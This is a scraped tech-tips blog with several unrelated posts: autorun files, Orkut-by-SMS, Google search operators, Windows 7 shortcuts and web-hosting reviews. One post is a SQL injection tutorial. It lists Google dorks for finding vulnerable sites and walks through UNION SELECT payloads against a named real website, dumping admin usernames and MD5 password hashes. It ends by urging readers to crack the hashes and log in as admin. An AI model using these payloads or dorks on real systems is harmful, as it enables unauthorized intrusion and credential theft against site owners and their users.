Thursday, May 3, 2012
Saturday, January 22, 2011
Create Autorun file for yourself.
If you wanna make a autorun file for that CD you are ready to burn just read this…
1) You open notepad
2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE
Now save it but not as a .txt file but as a .inf file.
But remember! The “Setup_filename.EXE” MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called ‘.exe but some are called ‘.msi
3) Now burn your CD with the autorun .inf file included.
4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in “This Computer”
Get Orkut Scraps Through SMS
If you are thinking about, who written what in your Orkut Scrap Book and if you don‘t have access of Internet, this problem can be solved by getting all new Orkut Scraps in your mobile directly. To get Orkut Scraps in your mobile through SMS you need to do following things
Step 1. Join mobee.in , and submit your mobile number. By joining mobee.in you will get an email ID something like this
STEP 2. Change setting to your Orkut account by which you will get copy of all scraps in your GMAIL (mail account) also.
STEP 3. Open the gmail and set an option to filter and forward your orkutscrap to your mobee.in emailID. Choose filter word ?orkut? . If you do it, a copy of filtered mail (orkut related) will be sent to your mobee.in mail ID automatically.
STEP 4. mobee.in will forward (after receiving) this scrap to your mobile phone through SMS. Now read the scraps in your mobile.
Perform SQL Injection The Easy Way
In this tutorial you will understand how SQL INJECTION DONE in a very simple way.
SQL INJECTION is an attack technique used to exploit web sites by altering backend SQL statements through manipulating application input.
Here we go!!
1). Search for a vulnerable site.
Highlight one then press ctrl+c then ctrl+v at your browser address bar.
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=
Thanks to Trilobite for this tutorial.
2.Suppose we have this one.
Code:
http://www.shangproperties.com/news_archive.php?id=6
We will check it’s vulnerability by adding magic qoute (‘) at the end of the url.
3.So the url will be like this:
Code:
http://www.shangproperties.com/news_archive.php?id=6
‘
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6′;
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4.The next step is find out how many columns the database contain
To find it we use “order by” (without the qoute) and this string ” — ” (no qoute).
It will look like this:
Code:
http://www.shangproperties.com/news_archive.php?id=6
order by 1– (no error)
Code:
http://www.shangproperties.com/news_archive.php?id=6
order by 2– (no error)
Code:
http://www.shangproperties.com/news_archive.php?id=6
order by 3– (no error)
we move a little higher. (it doesn’t matter)
Code:
http://www.shangproperties.com/news_archive.php?id=6
order by 10– (no error)
Code:
http://www.shangproperties.com/news_archive.php?id=6
order by 14– (no error)
until we got an error:
Code:
http://www.shangproperties.com/news_archive.php?id=6
order by 15– (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15–;
mySQL Error: 1054 (Unknown column ’15′ in ‘order clause’)
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column ’15′ in ‘order clause’)
this mean the database contain only 14 columns.
5.. Now use “-” (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14–
we hit enter.
numbers appears..
Like this:
6
, 5
8
6.Now we will check it’s MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14–
and you will get a result like this:
6
, 5
5.1.32 <–this is the version
Now we get the version.
7.Getting Table Name.
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14–
were not done already: (don’t hit enter)
between number 14 and this “–” (quote) insert this:
+from+information_schema.tables+where+table_schema =database()–
it will look like this:
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()–
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhot o,active_sessions_split,auth_u??ser_md5
8. Now we’re done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: Click here!
paste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()–
replace also +from+information_schema.tables+where+table_schema =database()–
to
+from+information_schema.columns+where+table_name= 0x617574685f757365725f6d6435–
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_nam e=0x617574685f757365725f6d6435–
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleNam e,LastName,Position,EmailAddre? ?ss,ContactNumbers,DateCreated,CreatedBy,DateModif ied,ModifiedBy,Status
9.We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,Password,0x 3a,Perms,0x3a,FirstName,0x3a,M? ? iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAd dress,0x3a,ContactNumbers,0x3a? ? ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a ,ModifiedBy,0x3aStatus)
but I prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0×6175 74685f757365725f6d6435– to +from+auth_user_md5–
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
Code:
http://www.shangproperties.com/news_archive.php?id=-6
union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5–
I hit enter, we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
Now just crack the MD5 hash (Use the MD5 hash crackers, Google it)
Vuila. You’ve got the info! Just use Admin Page Finders to find the Admin page. Again, Google Admin Page Finder. You’ve hacked a site. Good job!
20 Great Google Secrets
www.pcmag.com/searchengines
But most people don’t use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number.
But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google’s search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of Google’s lesser-known options.
Syntax Search Tricks
Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at
www.google.com/help/operators.html
. Here are some advanced operators that can help narrow down your search results.
Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.
Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as
www.mysite.com/index.html
, you can enter intext:html.
Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in
link:http://www.pcmag.com
Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.
Swiss Army Google
Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature
(www.google.com/help/features.html#calculator)
lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”
Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.
Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search
(www.buzztoolbox.com/google/yellowsearch.shtml).
Extended Googling
Google offers several services that give you a head start in focusing your search. Google Groups
(http://groups.google.com)
indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),
which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),
which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at
www.google.com/options/index.html
You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?
Google Alert
(www.googlealert.com)
monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts
(www.google.com/newsalerts).
This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)
Google on the telephone? Yup. This service is brought to you by the folks at Google Labs
(http://labs.google.com),
a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out). With Google Voice Search
(http://labs1.google.com/gvs.html),
you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.
In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from
CODE
www.google.com/apis
. See the figures for two more examples, and visit
www.pcmag.com/solutions
for more.
Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You’ll be amazed at how many different ways Google can improve your Internet searching.
Online Extra: More Google Tips
Here are a few more clever ways to tweak your Google searches.
Search Within a Timeframe
Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic’s current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as
CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html
excl.gif No Active Links, Read the Rules – Edit by Ninja excl.gif
), but an easier way is to do a Google daterange: search by filling in a form at
www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml
. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can’t be mixed (you can’t use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.
More Google API Applications
Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query
(www.staggernation.com/gawsh/).
When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL
(www.staggernation.com/garbo/).
Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it’s not something you’d do every day, but if your cell phone does e-mail and doesn’t do Web browsing, this is a very handy address to know.
Window 7 Tricks
Some Window 7 Tricks As you all know Windows 7 RC3 is launched.There are some tricks which can be Easily be executed………..
From Desktop
1. Windows Key + Tab : Aero
2. Windows Key + E : Windows Explorer is launched.
3. Windows Key + R : Run Command is launched.
4. Windows Key + F : Search
5. Windows Key + X : Mobility Center
6. Windows Key + L : Lock Computer
7. Windows Key + U : Launches Ease of Access
8. Windows Key + P : Projector
9. Windows Key + T : Cycle Super Taskbar Items
10. Windows Key + S : OneNote Screen Clipping Tool
11. Windows Key + M : Minimize All Windows
12. Windows Key + D : Show/Hide Desktop
13. Windows Key + Up : Maximize Current Window
14. Windows Key + Down : Restore Down / Minimize
15. Windows Key + Left : Tile Current Window to the Left
16. Windows Key + Right : Tile Current Windows Right
17. Windows Key + # (# is any number)
18. Windows Key + = : Launches the Magnifier
19. Windows Key + Plus : Zoom in
20. Windows Key + Minus : Zooms out
21. Windows Key + Space : Peek at the desktop
From Windows Explorer
22. Alt + Up: Go up one level
23. Alt + Left/ Right: Back/ Forward
24. Alt + P: Show/hide Preview Pane
65
Taskbar modifiers
25. Shift + Click on icon: Open a new instance
26. Middle click on icon: Open a new instance
27. Ctrl + Shift + Click on icon: Open a new instance with Admin privileges
28. Shift + Right-click on icon: Show window menu
29. Shift + Right-click on grouped icon: Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon: Cycle between the windows (or tabs) in the group
Monday, January 3, 2011
Web Hosting.
Hostgator
We are happy to say we have started using Hostgator as a web site hosting company and are delighted with the servers and with service. With packages starting at $5.95 USD per month, Hostgator is a sweet deal. It is also the host of choice for many pro Internet Marketers who use the Reseller Package to host all their web sites. It boasts CPanel and WHM control panels, which are very popular control panels for your hosting admin area.
Click here to check out the Hostgator web site or to sign up for an account.
Dreamhost
Is probably the most popular one-click install company, most-likely because of their very popular affiliate program. There are as many Dreamhost evangelists as there are detractors, but the one thing you can be sure of is that Dreamhost’s popularity hasn’t waned, and they are still one of the top hosting companies out there. Their newsletter will make you laugh too, as it boasts some of the wittiest corporate writing out there.
A big plus – the company is very honest about what’s going on with their service and have a blog and wiki set up so that you can stay up-to-date with what is going on with your server’s status.
Dreamhost’s Crazy Domain Insane! package costs $7.95 a month if you sign up and pay for 2 years up front. This will get you 150 GB of web host space, which increases weekly by 1 GB. Yes, this incentive is quite unique, but it seems to be working.
You get a lot of web space and transfer with Dreamhost – the allowed bandwidth or transfer amount increases weekly too, starting at 1.5 TB and increasing weekly by 16 GB.
With Dreamhost, you can host as many domain names as you like on this package and have unlimited MySql databases running – enough to set up a blogging empire. You also get 1 year of free domain name registration.
I am currently hosting this site and a few other blogs with Dreamhost and I have had very little problems with them and found their support service quite speedy.
The Dreamhost control panel also allows for other Dreamhost one-click installs include Gallery, ZenCart, PhpGedView, Pligg, dotProject, Moodle, Joomla, phpBB, MediaWiki, WebCalendar, Advanced Poll, and Trac
This way to review the Dreamhost package in more detail.
Midphase
Is growing quite a strong fan base and while is used to be one of the more expensive companies to host with, they have now become very competitive. Their basic starter package is only $2.95 and will get you unlimited space and bandwidth, and a domain name. Unlimited domains will cost you $5.95 a month.
As usual, do your research to choose the right company for you. A quick Google search of any company name above and you will find tons of fan mail, heated debates, as well as a few horror stories. But I think you will be safe with any of the companies above unless you plan on getting millions of hits a day, which in that case you should be able to afford a dedicated server (one that you do not share with anyone else.) And that is a good problem to have
Get blogging now!
The easiest way to set up a WordPress blog is with one click installs. You might not have the prettiest blog and you will need to add plugins and change your settings so that you won’t be inundated with spam, or so your site will be found, but you will have a blog. And that is good.